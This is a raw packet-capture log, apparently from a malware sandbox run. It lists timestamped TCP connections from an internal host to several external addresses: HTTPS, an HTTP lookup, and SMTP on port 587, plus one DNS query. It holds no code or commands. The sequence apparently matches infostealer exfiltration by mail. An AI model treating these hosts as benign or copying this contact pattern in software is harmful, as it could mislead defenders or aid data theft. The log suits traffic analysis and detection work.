Jan 14, 2025 14:23:27.412877083 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:27.413048029 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:27.413048029 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:27.628390074 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:27.628923893 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:27.628943920 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:27.628964901 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:27.629031897 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:27.629031897 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:27.856813908 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:27.856904030 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:27.856961012 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:27.856961012 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:27.856982946 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:27.857079983 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:28.088742018 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:28.088865042 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:28.088891029 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:28.088917971 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:28.088917971 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:28.088937998 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:28.088984966 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:28.088984966 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:28.309251070 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:28.309391975 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:28.309416056 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:28.309432030 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:28.309448004 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:28.309483051 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:28.309495926 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:28.309551001 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:28.309556961 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:28.309854031 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:28.536576033 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:28.536799908 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:28.536823034 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:28.536953926 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:28.624008894 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:28.624119997 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:28.624149084 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:28.624228001 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.186222076 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.186281919 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.186304092 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.186321020 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.186341047 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.186368942 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.197429895 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.197494030 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.367471933 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.367552042 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.367577076 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.367590904 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.367609978 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.367638111 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.367664099 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.368110895 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.368174076 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.381108046 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.381169081 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.553580046 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.553699970 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.553703070 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.553730011 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.553747892 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.553770065 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.553806067 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.553852081 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.567017078 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.567095995 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.567147970 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.567198992 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.748805046 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.748855114 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.748918056 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.748955011 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.748974085 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.748999119 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.760083914 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.760149002 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.760157108 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.760199070 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.760380983 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.760423899 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.941361904 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.941462994 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.941487074 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.941538095 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.941557884 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.941584110 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.955053091 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.955131054 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.955158949 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.955226898 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:29.964561939 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:29.964624882 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.122637033 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.122860909 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.122896910 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.122960091 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.196525097 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.196692944 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.196729898 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.196818113 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.196866035 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.196919918 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.196938992 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.196950912 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.197005987 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.395731926 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.395884037 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.423903942 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.423955917 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.424083948 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.424113989 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.424163103 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.676631927 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.676748991 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.676753998 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.676775932 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.676794052 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.676794052 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.676819086 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.676826000 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.676835060 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.677237988 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.677288055 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.677294970 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.677330017 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.677448034 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.677493095 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.908956051 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.909001112 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.909172058 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.909172058 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.909192085 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.909205914 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.909234047 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.909240007 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.909276009 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.954776049 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:30.954807043 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:30.994867086 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:31.288784981 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:31.288801908 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:31.288893938 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:31.288929939 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:31.288954020 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:31.288968086 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:31.289000034 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:31.375931978 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:31.376008034 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:31.608253956 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:31.608334064 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:31.698523998 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:31.698635101 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:31.698654890 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:31.698678017 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:31.698688030 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:31.698714018 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:31.740838051 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:31.740914106 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:31.741091013 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:31.741152048 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:31.779850960 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:31.780019999 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:31.976721048 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:31.976840973 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:31.977018118 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:31.977091074 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:31.977106094 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:31.977117062 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:31.977142096 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:32.026016951 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:32.026036978 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.072865009 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:32.340426922 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.340441942 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.340502977 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:32.340545893 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.340553045 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.340588093 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:32.340605021 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:32.340890884 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.340899944 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.340946913 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.340950966 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:32.340967894 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.341005087 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:32.564810038 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.564862013 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.564897060 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.564954996 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:32.564990044 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.565005064 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:32.619754076 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:32.809355021 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.809446096 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:32.809484959 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.809514046 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.809565067 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:32.809596062 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:32.809746027 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.809756994 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.809813023 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:32.809971094 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.809982061 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:32.810036898 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:33.099304914 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:33.099453926 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:33.099749088 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:33.099883080 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:33.099922895 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:33.099941015 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:33.099983931 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:33.357079983 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:33.357166052 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:33.357191086 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:33.357234955 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:33.357418060 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:33.357462883 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:33.357477903 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:33.357521057 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:33.568459034 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:33.568583965 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:33.568598032 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:33.568643093 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:33.885030031 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:33.885096073 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:33.885133982 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:33.885160923 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:33.885274887 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:33.885274887 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:33.885274887 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:33.885354042 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:33.885411978 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:34.337327957 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:34.337447882 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:34.337460995 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:34.337485075 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:34.337510109 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:34.385387897 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:34.636600018 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:34.637669086 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:34.860817909 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:34.860887051 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:34.860913992 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:34.860954046 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:35.109006882 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:35.109106064 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:35.109117031 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:35.109138966 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:35.109162092 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:35.109175920 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:35.345437050 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:35.345546007 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:35.345588923 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:35.345629930 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:35.683682919 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:35.683806896 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:35.683850050 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:35.683890104 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:35.686270952 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:36.699698925 CET	49888	80	192.168.2.7	193.122.130.0
Jan 14, 2025 14:23:36.704540968 CET	80	49888	193.122.130.0	192.168.2.7
Jan 14, 2025 14:23:36.704763889 CET	49888	80	192.168.2.7	193.122.130.0
Jan 14, 2025 14:23:36.705039024 CET	49888	80	192.168.2.7	193.122.130.0
Jan 14, 2025 14:23:36.710016966 CET	80	49888	193.122.130.0	192.168.2.7
Jan 14, 2025 14:23:37.170123100 CET	80	49888	193.122.130.0	192.168.2.7
Jan 14, 2025 14:23:37.173716068 CET	49888	80	192.168.2.7	193.122.130.0
Jan 14, 2025 14:23:37.178977013 CET	80	49888	193.122.130.0	192.168.2.7
Jan 14, 2025 14:23:37.277646065 CET	80	49888	193.122.130.0	192.168.2.7
Jan 14, 2025 14:23:37.279335976 CET	49893	443	192.168.2.7	104.21.64.1
Jan 14, 2025 14:23:37.279372931 CET	443	49893	104.21.64.1	192.168.2.7
Jan 14, 2025 14:23:37.279808044 CET	49893	443	192.168.2.7	104.21.64.1
Jan 14, 2025 14:23:37.283077955 CET	49893	443	192.168.2.7	104.21.64.1
Jan 14, 2025 14:23:37.283091068 CET	443	49893	104.21.64.1	192.168.2.7
Jan 14, 2025 14:23:37.322866917 CET	49888	80	192.168.2.7	193.122.130.0
Jan 14, 2025 14:23:37.888780117 CET	443	49893	104.21.64.1	192.168.2.7
Jan 14, 2025 14:23:37.888900042 CET	49893	443	192.168.2.7	104.21.64.1
Jan 14, 2025 14:23:37.907319069 CET	49893	443	192.168.2.7	104.21.64.1
Jan 14, 2025 14:23:37.907339096 CET	443	49893	104.21.64.1	192.168.2.7
Jan 14, 2025 14:23:37.907808065 CET	443	49893	104.21.64.1	192.168.2.7
Jan 14, 2025 14:23:37.965991974 CET	49893	443	192.168.2.7	104.21.64.1
Jan 14, 2025 14:23:38.550597906 CET	49893	443	192.168.2.7	104.21.64.1
Jan 14, 2025 14:23:38.591329098 CET	443	49893	104.21.64.1	192.168.2.7
Jan 14, 2025 14:23:38.662874937 CET	443	49893	104.21.64.1	192.168.2.7
Jan 14, 2025 14:23:38.662945032 CET	443	49893	104.21.64.1	192.168.2.7
Jan 14, 2025 14:23:38.663053036 CET	49893	443	192.168.2.7	104.21.64.1
Jan 14, 2025 14:23:38.665870905 CET	49893	443	192.168.2.7	104.21.64.1
Jan 14, 2025 14:23:44.051229954 CET	49888	80	192.168.2.7	193.122.130.0
Jan 14, 2025 14:23:44.058058023 CET	80	49888	193.122.130.0	192.168.2.7
Jan 14, 2025 14:23:44.154553890 CET	80	49888	193.122.130.0	192.168.2.7
Jan 14, 2025 14:23:44.159943104 CET	49932	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:44.166460037 CET	587	49932	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:44.166548967 CET	49932	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:44.197922945 CET	49888	80	192.168.2.7	193.122.130.0
Jan 14, 2025 14:23:44.715997934 CET	587	49932	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:44.716322899 CET	49932	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:44.721195936 CET	587	49932	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:44.874416113 CET	587	49932	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:44.874761105 CET	49932	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:44.879662037 CET	587	49932	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:45.033493042 CET	587	49932	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:45.033771992 CET	49932	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:45.038628101 CET	587	49932	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:45.195302010 CET	587	49932	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:45.195664883 CET	49932	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:45.200689077 CET	587	49932	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:45.356329918 CET	587	49932	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:45.356570005 CET	49932	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:45.361474037 CET	587	49932	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:45.517359018 CET	587	49932	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:45.517606020 CET	49932	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:45.522474051 CET	587	49932	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:45.675817966 CET	587	49932	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:45.676670074 CET	49932	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:45.676739931 CET	49932	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:45.676765919 CET	49932	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:45.676781893 CET	49932	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:45.681679964 CET	587	49932	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:45.681715012 CET	587	49932	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:45.681823015 CET	587	49932	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:45.681853056 CET	587	49932	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:45.947438955 CET	587	49932	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:45.994786024 CET	49932	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:24:06.526346922 CET	49736	80	192.168.2.7	193.122.130.0
Jan 14, 2025 14:24:06.531385899 CET	80	49736	193.122.130.0	192.168.2.7
Jan 14, 2025 14:24:06.531475067 CET	49736	80	192.168.2.7	193.122.130.0
Jan 14, 2025 14:24:34.167097092 CET	49888	80	192.168.2.7	193.122.130.0
Jan 14, 2025 14:24:34.172605038 CET	80	49888	193.122.130.0	192.168.2.7
Jan 14, 2025 14:24:34.172771931 CET	49888	80	192.168.2.7	193.122.130.0
Jan 14, 2025 14:24:56.542357922 CET	49780	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:24:56.547267914 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:24:56.702621937 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:24:56.702744961 CET	49780	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:24:56.702780008 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:24:56.702847004 CET	49780	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:24:56.707561970 CET	587	49780	162.254.34.31	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 14:22:55.681185007 CET	57433	53	192.168.2.7	1.1.1.1
